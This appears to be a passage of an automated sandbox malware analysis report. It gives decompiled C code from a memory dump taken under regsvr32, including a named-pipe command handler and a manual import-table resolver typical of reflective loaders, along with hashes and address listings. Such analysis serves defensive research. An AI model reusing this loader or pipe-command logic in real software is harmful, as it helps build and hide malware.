                                                                                                                                                                                              • Opcode Fuzzy Hash: f08e21ea886c00c904f988ab642501821b33211c2169a52e52b7ee400fe0f3e5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 32216A70760245BBDB248B67DC4CE5BBF7CEFC2B15F01405CBA01A7290D670AA41DA70
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042B3379 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 85stringCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                              			E042B3379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				signed int _t23;
				void* _t30;
				char* _t31;
				char* _t33;
				char* _t35;
				char* _t37;
				char* _t38;
				long long* _t40;

				_t30 = __edi;
				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t35 = _a4;
				_push(_t25);
				 *_t40 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t35);
				L042B34D2();
				_t23 = _t12;
				if(_t23 < 0 || _t23 >= _a8) {
					L16:
					_t13 = _t12 | 0xffffffff;
					goto L17;
				} else {
					E042B3352(_t12, _t35);
					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
						L8:
						_push(_t30);
						_t37 = strchr(_t35, 0x65);
						_t31 = _t37;
						if(_t37 == 0) {
							L15:
							_t13 = _t23;
							L17:
							return _t13;
						}
						_t38 = _t37 + 1;
						_t33 = _t31 + 2;
						if( *_t38 == 0x2d) {
							_t38 = _t33;
						}
						while( *_t33 == 0x30) {
							_t33 = _t33 + 1;
						}
						if(_t33 != _t38) {
							E042A8CE0(_t38, _t33, _t23 - _t33 + _a4);
							_t23 = _t23 + _t38 - _t33;
						}
						goto L15;
					} else {
						_t6 = _t23 + 3; // 0x42b1b64
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L16;
						}
						_t35[_t23] = 0x302e;
						( &(_t35[2]))[_t23] = 0;
						_t23 = _t23 + 2;
						goto L8;
					}
				}
			}













                                                                                                                                                                                              0x042b3379
                                                                                                                                                                                              0x042b337c
                                                                                                                                                                                              0x042b3381
                                                                                                                                                                                              0x042b3385
                                                                                                                                                                                              0x042b3385
                                                                                                                                                                                              0x042b338b
                                                                                                                                                                                              0x042b338f
                                                                                                                                                                                              0x042b3390
                                                                                                                                                                                              0x042b3393
                                                                                                                                                                                              0x042b3394
                                                                                                                                                                                              0x042b3399
                                                                                                                                                                                              0x042b339c
                                                                                                                                                                                              0x042b339d
                                                                                                                                                                                              0x042b33a2
                                                                                                                                                                                              0x042b33a9
                                                                                                                                                                                              0x042b3432
                                                                                                                                                                                              0x042b3432
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b33b4
                                                                                                                                                                                              0x042b33b5
                                                                                                                                                                                              0x042b33c7
                                                                                                                                                                                              0x042b33ed
                                                                                                                                                                                              0x042b33ed
                                                                                                                                                                                              0x042b33f6
                                                                                                                                                                                              0x042b33f8
                                                                                                                                                                                              0x042b33fe
                                                                                                                                                                                              0x042b342d
                                                                                                                                                                                              0x042b342d
                                                                                                                                                                                              0x042b3435
                                                                                                                                                                                              0x042b3438
                                                                                                                                                                                              0x042b3438
                                                                                                                                                                                              0x042b3400
                                                                                                                                                                                              0x042b3401
                                                                                                                                                                                              0x042b3407
                                                                                                                                                                                              0x042b3409
                                                                                                                                                                                              0x042b3409
                                                                                                                                                                                              0x042b340e
                                                                                                                                                                                              0x042b340d
                                                                                                                                                                                              0x042b340d
                                                                                                                                                                                              0x042b3415
                                                                                                                                                                                              0x042b3421
                                                                                                                                                                                              0x042b342b
                                                                                                                                                                                              0x042b342b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b33d7
                                                                                                                                                                                              0x042b33d7
                                                                                                                                                                                              0x042b33d7
                                                                                                                                                                                              0x042b33dd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b33df
                                                                                                                                                                                              0x042b33e5
                                                                                                                                                                                              0x042b33ea
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b33ea
                                                                                                                                                                                              0x042b33c7

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: strchr$_snprintf
                                                                                                                                                                                              • String ID: %.*g
                                                                                                                                                                                              • API String ID: 3619936089-952554281
                                                                                                                                                                                              • Opcode ID: 17ce35048cca36150ce7ba88bbbe10e68463c1335ac972382365217245c712fb
                                                                                                                                                                                              • Instruction ID: 268c26fe3d106b6f7708b11eebfa910fee0feee9c275813ef30b2ced832d4208
                                                                                                                                                                                              • Opcode Fuzzy Hash: 17ce35048cca36150ce7ba88bbbe10e68463c1335ac972382365217245c712fb
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3521266277461526EB22DE98EC81FDB7BACAF013D4F148025FDC496140E6B1B94443D0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042A377F Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 306pipeCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                              			E042A377F(void* __fp0) {
				signed int _v144;
				signed int _v152;
				char _v160;
				char _v164;
				char _v168;
				signed int _v172;
				char _v176;
				intOrPtr _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				char _v200;
				signed int _v204;
				intOrPtr _t72;
				intOrPtr _t75;
				signed int _t80;
				signed int _t81;
				signed int _t84;
				signed int _t87;
				signed int _t88;
				signed int _t100;
				void* _t102;
				void* _t103;
				unsigned int* _t104;
				signed int _t110;
				signed int _t113;
				void* _t118;
				intOrPtr _t124;
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t132;
				void* _t133;
				void* _t137;
				signed int _t146;
				signed int _t148;
				signed short* _t149;
				signed int _t159;
				intOrPtr* _t183;
				void* _t187;
				void* _t188;
				void* _t189;
				signed short* _t192;
				void* _t196;
				signed int _t199;
				signed int _t200;
				signed int _t203;
				signed int _t204;
				char _t205;
				signed int _t206;
				void* _t208;
				void* _t214;
				void* _t221;

				_t221 = __fp0;
				_t208 = (_t206 & 0xfffffff8) - 0xac;
				_v144 = 0;
				_v172 = 0;
				while(1) {
					_t72 =  *0x42bf818; // 0x48ef8b0
					_push(0);
					_push( *0x42bf804);
					_v152 = 0;
					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
						break;
					}
					_push(0);
					_push( &_v160);
					_t75 =  *0x42bf818; // 0x48ef8b0
					_push(0x80000);
					_push( *0x42bf8bc);
					_push( *0x42bf804);
					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
						GetLastError();
						goto L56;
					} else {
						_t149 =  *0x42bf8bc; // 0x0
						_t80 =  *_t149 & 0x0000ffff;
						_t214 = _t80 - 8;
						if(_t214 > 0) {
							_t81 = _t80 - 9;
							__eflags = _t81;
							if(_t81 == 0) {
								E042B0962( &_v200);
								L12:
								_t84 =  &_v200;
								L13:
								_push(4);
								L14:
								_push(_t84);
								_push(5);
								L31:
								_pop(_t187);
								E042AD1A6(_t187);
								L32:
								L56:
								DisconnectNamedPipe( *0x42bf804);
								_push(0);
								_pop(0);
								if(_v172 == 0) {
									continue;
								}
								break;
							}
							_t87 = _t81;
							__eflags = _t87;
							if(_t87 == 0) {
								_v204 = 0;
								_t88 = E042A171A( &_v204, _t221);
								_v188 = _t88;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(4);
									_v192 = 0;
									_push( &_v192);
									L19:
									_push(0xa);
									goto L31;
								}
								_t146 = _v204;
								_t90 = _t146 * 0x16;
								_v184 = _t146 * 0x16;
								_t203 = E042A8BDE(_t90);
								_v192 = _t203;
								__eflags = _t203;
								if(_t203 == 0) {
									_t64 =  &_v192;
									 *_t64 = _v192 & 0x00000000;
									__eflags =  *_t64;
									_push(4);
									_push( &_v192);
									_t188 = 0xa;
									E042AD1A6(_t188);
									L52:
									E042A8BF4( &_v188, _t146);
									goto L32;
								}
								_t199 = 0;
								__eflags = _t146;
								if(_t146 == 0) {
									L50:
									_push(E042AA43D(_t203));
									_push(_t203);
									_t189 = 5;
									E042AD1A6(_t189);
									E042A8BF4( &_v192, 0xffffffff);
									_t208 = _t208 + 0x10;
									goto L52;
								}
								_t159 = _v188 + 4;
								__eflags = _t159;
								_v204 = _t159;
								do {
									__eflags = _t199;
									if(_t199 != 0) {
										__eflags = _t199 - _t146 - 1;
										if(_t199 < _t146 - 1) {
											_t102 = E042AA43D(_t203);
											_t159 = _v204;
											 *((short*)(_t102 + _t203)) = 0x3b;
										}
									}
									_t100 =  *_t159;
									_v196 = _t100;
									__eflags = _t100;
									if(_t100 != 0) {
										_t103 = E042AA43D(_t203);
										_t104 = _v204;
										_push(_t104[1] & 0x0000ffff);
										_push( *_t104 >> 0x18);
										_push(_t104[0] & 0x000000ff);
										_push(_t104[0] & 0x000000ff);
										_t110 = E042AA43D(_t203) + _t203;
										__eflags = _t110;
										E042A9E12(_t110, _v184 - _t103, "%u.%u.%u.%u:%u", _v196 & 0x000000ff);
										_t159 = _v204;
										_t208 = _t208 + 0x20;
									}
									_t199 = _t199 + 1;
									_t159 = _t159 + 0x20;
									_v204 = _t159;
									__eflags = _t199 - _t146;
								} while (_t199 < _t146);
								goto L50;
							}
							__eflags = _t87 != 1;
							if(_t87 != 1) {
								goto L56;
							}
							_v204 = 0;
							_t113 = E042A171A( &_v204, _t221);
							_t204 = _v204;
							_v196 = _t113;
							__eflags = _t113;
							if(_t113 != 0) {
								E042A8BF4( &_v196, _t204);
							}
							_v204 = _t204 * 0x16;
							_t84 =  &_v204;
							goto L13;
						}
						if(_t214 == 0) {
							_t84 = E042B0962( &_v200);
							L16:
							__eflags = _t84;
							if(_t84 == 0) {
								_push(0);
								_push(0);
								goto L19;
							}
							_push(_v200);
							goto L14;
						}
						_t118 = _t80 - 1;
						if(_t118 == 0) {
							_t200 = E042A9B33( &(_t149[4]), 0x20, 1,  &_v176);
							_v196 = _t200;
							__eflags = _t200;
							if(_t200 == 0) {
								L30:
								_t192 =  *0x42bf8bc; // 0x0
								E042A9EDB( &_v164,  &(_t192[4]), 0x80);
								_push(0x84);
								_push( &_v168);
								_push(2);
								goto L31;
							}
							_t205 = _v176;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								_t124 = E042A1DD3(E042A9F6F( *_t200, __eflags), 0, 0, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t124;
								goto L30;
							}
							_t125 = _t205 - 1;
							_v184 = _t205 - 1;
							_t127 = E042A8BDE(_t125 << 2);
							_v188 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								goto L30;
							}
							_t148 = 1;
							__eflags = _t205 - 1;
							if(__eflags <= 0) {
								L28:
								_t129 = E042A1DD3(E042A9F6F( *_t200, __eflags), _t127, _v184, 0);
								_t208 = _t208 + 0x10;
								_v168 = _t129;
								E042A9C2C( &_v176);
								goto L30;
							}
							_v204 = _t127;
							do {
								_t132 = E042A9880( *((intOrPtr*)(_t200 + _t148 * 4)), E042AA43D( *((intOrPtr*)(_t200 + _t148 * 4))));
								_t183 = _v204;
								_t148 = _t148 + 1;
								 *_t183 = _t132;
								_v204 = _t183 + 4;
								__eflags = _t148 - _t205;
							} while (__eflags < 0);
							_t127 = _v188;
							goto L28;
						}
						_t133 = _t118 - 3;
						if(_t133 == 0) {
							_push(0);
							_push(0);
							_t196 = 5;
							E042A5EC3(E042AD1A6(_t196));
							_v172 = 1;
							goto L56;
						}
						_t137 = _t133;
						if(_t137 == 0) {
							_t84 = E042B0940( &_v200);
							goto L16;
						}
						if(_t137 != 1) {
							goto L56;
						}
						E042B0940( &_v200);
						goto L12;
					}
				}
				return 0;
			}
























































                                                                                                                                                                                              0x042a377f
                                                                                                                                                                                              0x042a3785
                                                                                                                                                                                              0x042a3790
                                                                                                                                                                                              0x042a3794
                                                                                                                                                                                              0x042a3798
                                                                                                                                                                                              0x042a3798
                                                                                                                                                                                              0x042a379d
                                                                                                                                                                                              0x042a379e
                                                                                                                                                                                              0x042a37a4
                                                                                                                                                                                              0x042a37b0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a37c3
                                                                                                                                                                                              0x042a37c8
                                                                                                                                                                                              0x042a37c9
                                                                                                                                                                                              0x042a37ce
                                                                                                                                                                                              0x042a37d3
                                                                                                                                                                                              0x042a37d9
                                                                                                                                                                                              0x042a37e7
                                                                                                                                                                                              0x042a3af7
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a37f8
                                                                                                                                                                                              0x042a37f8
                                                                                                                                                                                              0x042a37fe
                                                                                                                                                                                              0x042a3801
                                                                                                                                                                                              0x042a3804
                                                                                                                                                                                              0x042a3976
                                                                                                                                                                                              0x042a3976
                                                                                                                                                                                              0x042a3979
                                                                                                                                                                                              0x042a3aed
                                                                                                                                                                                              0x042a3833
                                                                                                                                                                                              0x042a3834
                                                                                                                                                                                              0x042a3838
                                                                                                                                                                                              0x042a3838
                                                                                                                                                                                              0x042a383a
                                                                                                                                                                                              0x042a383a
                                                                                                                                                                                              0x042a383b
                                                                                                                                                                                              0x042a395a
                                                                                                                                                                                              0x042a395a
                                                                                                                                                                                              0x042a395b
                                                                                                                                                                                              0x042a3960
                                                                                                                                                                                              0x042a3afd
                                                                                                                                                                                              0x042a3b03
                                                                                                                                                                                              0x042a3b0e
                                                                                                                                                                                              0x042a3b10
                                                                                                                                                                                              0x042a3b11
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3b11
                                                                                                                                                                                              0x042a3980
                                                                                                                                                                                              0x042a3980
                                                                                                                                                                                              0x042a3983
                                                                                                                                                                                              0x042a39c8
                                                                                                                                                                                              0x042a39cc
                                                                                                                                                                                              0x042a39d1
                                                                                                                                                                                              0x042a39d5
                                                                                                                                                                                              0x042a39d7
                                                                                                                                                                                              0x042a3ad8
                                                                                                                                                                                              0x042a3ade
                                                                                                                                                                                              0x042a3ae2
                                                                                                                                                                                              0x042a3859
                                                                                                                                                                                              0x042a3859
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3859
                                                                                                                                                                                              0x042a39dd
                                                                                                                                                                                              0x042a39e1
                                                                                                                                                                                              0x042a39e5
                                                                                                                                                                                              0x042a39ee
                                                                                                                                                                                              0x042a39f0
                                                                                                                                                                                              0x042a39f5
                                                                                                                                                                                              0x042a39f7
                                                                                                                                                                                              0x042a3ab2
                                                                                                                                                                                              0x042a3ab2
                                                                                                                                                                                              0x042a3ab2
                                                                                                                                                                                              0x042a3abb
                                                                                                                                                                                              0x042a3abd
                                                                                                                                                                                              0x042a3ac0
                                                                                                                                                                                              0x042a3ac1
                                                                                                                                                                                              0x042a3ac8
                                                                                                                                                                                              0x042a3ace
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3ace
                                                                                                                                                                                              0x042a39fd
                                                                                                                                                                                              0x042a39ff
                                                                                                                                                                                              0x042a3a01
                                                                                                                                                                                              0x042a3a90
                                                                                                                                                                                              0x042a3a97
                                                                                                                                                                                              0x042a3a98
                                                                                                                                                                                              0x042a3a9b
                                                                                                                                                                                              0x042a3a9c
                                                                                                                                                                                              0x042a3aa8
                                                                                                                                                                                              0x042a3aad
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3aad
                                                                                                                                                                                              0x042a3a0b
                                                                                                                                                                                              0x042a3a0b
                                                                                                                                                                                              0x042a3a0e
                                                                                                                                                                                              0x042a3a12
                                                                                                                                                                                              0x042a3a12
                                                                                                                                                                                              0x042a3a14
                                                                                                                                                                                              0x042a3a19
                                                                                                                                                                                              0x042a3a1b
                                                                                                                                                                                              0x042a3a1e
                                                                                                                                                                                              0x042a3a24
                                                                                                                                                                                              0x042a3a28
                                                                                                                                                                                              0x042a3a28
                                                                                                                                                                                              0x042a3a1b
                                                                                                                                                                                              0x042a3a2e
                                                                                                                                                                                              0x042a3a30
                                                                                                                                                                                              0x042a3a34
                                                                                                                                                                                              0x042a3a36
                                                                                                                                                                                              0x042a3a39
                                                                                                                                                                                              0x042a3a40
                                                                                                                                                                                              0x042a3a49
                                                                                                                                                                                              0x042a3a4f
                                                                                                                                                                                              0x042a3a54
                                                                                                                                                                                              0x042a3a5d
                                                                                                                                                                                              0x042a3a75
                                                                                                                                                                                              0x042a3a75
                                                                                                                                                                                              0x042a3a78
                                                                                                                                                                                              0x042a3a7d
                                                                                                                                                                                              0x042a3a81
                                                                                                                                                                                              0x042a3a81
                                                                                                                                                                                              0x042a3a84
                                                                                                                                                                                              0x042a3a85
                                                                                                                                                                                              0x042a3a88
                                                                                                                                                                                              0x042a3a8c
                                                                                                                                                                                              0x042a3a8c
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3a12
                                                                                                                                                                                              0x042a3985
                                                                                                                                                                                              0x042a3988
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3992
                                                                                                                                                                                              0x042a3996
                                                                                                                                                                                              0x042a399b
                                                                                                                                                                                              0x042a399f
                                                                                                                                                                                              0x042a39a3
                                                                                                                                                                                              0x042a39a5
                                                                                                                                                                                              0x042a39ad
                                                                                                                                                                                              0x042a39b3
                                                                                                                                                                                              0x042a39b7
                                                                                                                                                                                              0x042a39bb
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a39bb
                                                                                                                                                                                              0x042a380a
                                                                                                                                                                                              0x042a396c
                                                                                                                                                                                              0x042a384c
                                                                                                                                                                                              0x042a384d
                                                                                                                                                                                              0x042a384f
                                                                                                                                                                                              0x042a3857
                                                                                                                                                                                              0x042a3858
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3858
                                                                                                                                                                                              0x042a3851
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3851
                                                                                                                                                                                              0x042a3810
                                                                                                                                                                                              0x042a3813
                                                                                                                                                                                              0x042a388f
                                                                                                                                                                                              0x042a3891
                                                                                                                                                                                              0x042a3897
                                                                                                                                                                                              0x042a3899
                                                                                                                                                                                              0x042a3936
                                                                                                                                                                                              0x042a3936
                                                                                                                                                                                              0x042a3948
                                                                                                                                                                                              0x042a394e
                                                                                                                                                                                              0x042a3957
                                                                                                                                                                                              0x042a3958
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3958
                                                                                                                                                                                              0x042a389f
                                                                                                                                                                                              0x042a38a3
                                                                                                                                                                                              0x042a38a6
                                                                                                                                                                                              0x042a392a
                                                                                                                                                                                              0x042a392f
                                                                                                                                                                                              0x042a3932
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3932
                                                                                                                                                                                              0x042a38a8
                                                                                                                                                                                              0x042a38ab
                                                                                                                                                                                              0x042a38b3
                                                                                                                                                                                              0x042a38b8
                                                                                                                                                                                              0x042a38bd
                                                                                                                                                                                              0x042a38bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a38c3
                                                                                                                                                                                              0x042a38c4
                                                                                                                                                                                              0x042a38c6
                                                                                                                                                                                              0x042a38f5
                                                                                                                                                                                              0x042a3904
                                                                                                                                                                                              0x042a3909
                                                                                                                                                                                              0x042a390c
                                                                                                                                                                                              0x042a3918
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3918
                                                                                                                                                                                              0x042a38c8
                                                                                                                                                                                              0x042a38cc
                                                                                                                                                                                              0x042a38da
                                                                                                                                                                                              0x042a38df
                                                                                                                                                                                              0x042a38e3
                                                                                                                                                                                              0x042a38e4
                                                                                                                                                                                              0x042a38e9
                                                                                                                                                                                              0x042a38ed
                                                                                                                                                                                              0x042a38ed
                                                                                                                                                                                              0x042a38f1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a38f1
                                                                                                                                                                                              0x042a3815
                                                                                                                                                                                              0x042a3818
                                                                                                                                                                                              0x042a3860
                                                                                                                                                                                              0x042a3861
                                                                                                                                                                                              0x042a3864
                                                                                                                                                                                              0x042a386c
                                                                                                                                                                                              0x042a3871
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3871
                                                                                                                                                                                              0x042a381b
                                                                                                                                                                                              0x042a381e
                                                                                                                                                                                              0x042a3847
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3847
                                                                                                                                                                                              0x042a3823
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a382e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a382e
                                                                                                                                                                                              0x042a37e7
                                                                                                                                                                                              0x042a3b1f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 042A37B2
                                                                                                                                                                                                • Part of subcall function 042AD1A6: FlushFileBuffers.KERNEL32(00000000,?,042A3AC6,00000000,00000004), ref: 042AD1EC
                                                                                                                                                                                              • DisconnectNamedPipe.KERNEL32 ref: 042A3B03
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                                              • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                                              • API String ID: 465096328-3858738763
                                                                                                                                                                                              • Opcode ID: 2dbaeb198064519a30b93d885390d5fd6897bbbc96dc3a965909b1f911eaf715
                                                                                                                                                                                              • Instruction ID: 5c5330883bae30cfc6645f1154185a664dff2598db1ffbaa15da5071a5fd4a24
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2dbaeb198064519a30b93d885390d5fd6897bbbc96dc3a965909b1f911eaf715
                                                                                                                                                                                              • Instruction Fuzzy Hash: B8A1D3B2728302AFE314DF64D884A6BB7E8EB84314F04491EFD95C7180EB34E964CB56
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 042B370B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E042B370B(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E042AEFA7(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t34 = _v8 + 0xc; // 0xffff
						_v36 = LoadLibraryA( *_t34 + _a4);
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_t43 = _v8 + 0x10; // 0xb8
								_v12 =  *_t43 + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_t73 = _v8 + 0x10; // 0xb8
									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										_t89 = _v8 + 0x10; // 0xb8
										 *( *_t89 + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}























                                                                                                                                                                                              0x042b370b
                                                                                                                                                                                              0x042b3711
                                                                                                                                                                                              0x042b3719
                                                                                                                                                                                              0x042b372e
                                                                                                                                                                                              0x042b3740
                                                                                                                                                                                              0x042b374c
                                                                                                                                                                                              0x042b3752
                                                                                                                                                                                              0x042b3757
                                                                                                                                                                                              0x042b3763
                                                                                                                                                                                              0x042b38ce
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b38ce
                                                                                                                                                                                              0x042b3769
                                                                                                                                                                                              0x042b3772
                                                                                                                                                                                              0x042b3780
                                                                                                                                                                                              0x042b3783
                                                                                                                                                                                              0x042b3792
                                                                                                                                                                                              0x042b3792
                                                                                                                                                                                              0x042b3799
                                                                                                                                                                                              0x042b37a7
                                                                                                                                                                                              0x042b37aa
                                                                                                                                                                                              0x042b37ba
                                                                                                                                                                                              0x042b37c7
                                                                                                                                                                                              0x042b37ce
                                                                                                                                                                                              0x042b37de
                                                                                                                                                                                              0x042b37f0
                                                                                                                                                                                              0x042b37f6
                                                                                                                                                                                              0x042b37e0
                                                                                                                                                                                              0x042b37e8
                                                                                                                                                                                              0x042b37e8
                                                                                                                                                                                              0x042b37f9
                                                                                                                                                                                              0x042b37fd
                                                                                                                                                                                              0x042b3809
                                                                                                                                                                                              0x042b380d
                                                                                                                                                                                              0x042b3811
                                                                                                                                                                                              0x042b3815
                                                                                                                                                                                              0x042b3821
                                                                                                                                                                                              0x042b384c
                                                                                                                                                                                              0x042b3854
                                                                                                                                                                                              0x042b385a
                                                                                                                                                                                              0x042b3866
                                                                                                                                                                                              0x042b3872
                                                                                                                                                                                              0x042b3823
                                                                                                                                                                                              0x042b3828
                                                                                                                                                                                              0x042b3833
                                                                                                                                                                                              0x042b383f
                                                                                                                                                                                              0x042b383f
                                                                                                                                                                                              0x042b387b
                                                                                                                                                                                              0x042b3881
                                                                                                                                                                                              0x042b388b
                                                                                                                                                                                              0x042b38a7
                                                                                                                                                                                              0x042b388d
                                                                                                                                                                                              0x042b3890
                                                                                                                                                                                              0x042b389c
                                                                                                                                                                                              0x042b389c
                                                                                                                                                                                              0x042b388b
                                                                                                                                                                                              0x042b38af
                                                                                                                                                                                              0x042b38b8
                                                                                                                                                                                              0x042b38b8
                                                                                                                                                                                              0x042b38c6
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b38c6
                                                                                                                                                                                              0x042b37d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b37d2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042b37aa
                                                                                                                                                                                              0x00000000

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 042B3728
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 042B37C1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                                              • API String ID: 4133054770-1584408056
                                                                                                                                                                                              • Opcode ID: 5bece43bf096662d67de26d6c7eb87f9a3dfbeb91cd56bb5b59e83ecfbeec31c
                                                                                                                                                                                              • Instruction ID: efeee0b64e1ceccac02c5f25b280c8c493df26298a34b24db745e9b251e85ea4
